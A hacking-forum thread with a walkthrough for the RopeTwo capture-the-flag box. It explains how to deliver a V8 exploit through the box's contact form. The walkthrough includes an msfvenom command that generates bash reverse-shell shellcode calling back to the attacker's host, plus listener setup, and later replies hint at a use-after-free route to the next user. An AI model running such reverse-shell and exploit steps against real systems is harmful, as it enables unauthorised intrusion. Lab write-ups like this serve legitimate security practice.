TUTORIAL RopeTwo
by terobau - October 27, 2020 at 04:48 PM
#1
Here comes the exploit for rope2; this will only give you the shell on the box. User part coming soon.

First create two files: index.html and pwn.js

Copy the contents from the following links and make sure to change the IP in index.html.
For index.html:

https://ghostbin.co/paste/3arp6c2

For pwn.js:

https://ghostbin.co/paste/7sprd

Generate the shellcode:

msfvenom -p linux/x64/exec -f num CMD='bash -c "bash -i >& /dev/tcp/10.10.xx.xx/9001 0>&1"'


Replace the shellcode in pwn.js [line: 94] with your generated shellcode.

Now start a Python HTTP server on port 8080 [if you want to change the port, make sure to change it in index.html too] and a netcat listener on your selected port [use the same port that you used while generating the shellcode].

Head over to http://10.10.10.196:8000/contact

Type anything in name and subject, but paste the contents of index.html into the message box and click on send.
If everything works fine you should have a shell as chromeuser.

For those who want to know what's going on:
https://faraz.faith/2019-12-13-starctf-oob-v8-indepth/

The V8 used in the rope2 box is compiled with exactly the same patch as shown in the blog, but since pointer compression was later added, the exploit shown in the blog no longer works; tweaking the exploit a little bit should work.


Have a sweet reverse shell
#2
Thank you!!! Please, someone bring a Nobel prize for this guy.
#3
Thank you, but there is no user.txt and it's permission denied to access r4j.
#4
Really, you got the shell with these
scripts lolz
#5
(October 30, 2020 at 02:24 AM)lamehacker Wrote: Really, you got the shell with these
scripts lolz


Why?
Do you have any problem?
#6
(October 30, 2020 at 03:21 AM)terobau Wrote:
(October 30, 2020 at 02:24 AM)lamehacker Wrote: Really, you got the shell with these
scripts lolz


Why?
Do you have any problem?

The server doesn't get my page. I don't know why.
#7
Anyone moved on to user yet?
#8
(November 02, 2020 at 03:53 PM)dory23 Wrote: use /usr/bin/rshell to escalate to r4j

But how can I escalate from this binary?
#9
(November 02, 2020 at 03:53 PM)dory23 Wrote: use /usr/bin/rshell to escalate to r4j


Nice, a restricted shell. But how to escape?
#10
(November 02, 2020 at 05:27 PM)dory23 Wrote:
(November 02, 2020 at 04:55 PM)mandoline Wrote:
(November 02, 2020 at 03:53 PM)dory23 Wrote: use /usr/bin/rshell to escalate to r4j


Nice, a restricted shell. But how to escape?

Use Google; there is a website that has enough documentation about this shell and how it works.

It's not the restricted shell that you are thinking of; download the binary and reverse it.....
It has got a UAF.
#11
(November 04, 2020 at 02:16 AM)D0v3 Wrote: RopeTwo user and easy root:

[Hidden Content]

The zip file is password protected!!!
What is the password?
#12
(November 04, 2020 at 04:50 AM)Consigliere Wrote:
(November 04, 2020 at 02:16 AM)D0v3 Wrote: RopeTwo user and easy root:

[Hidden Content]

The zip file is password protected!!!
What is the password?

root hash
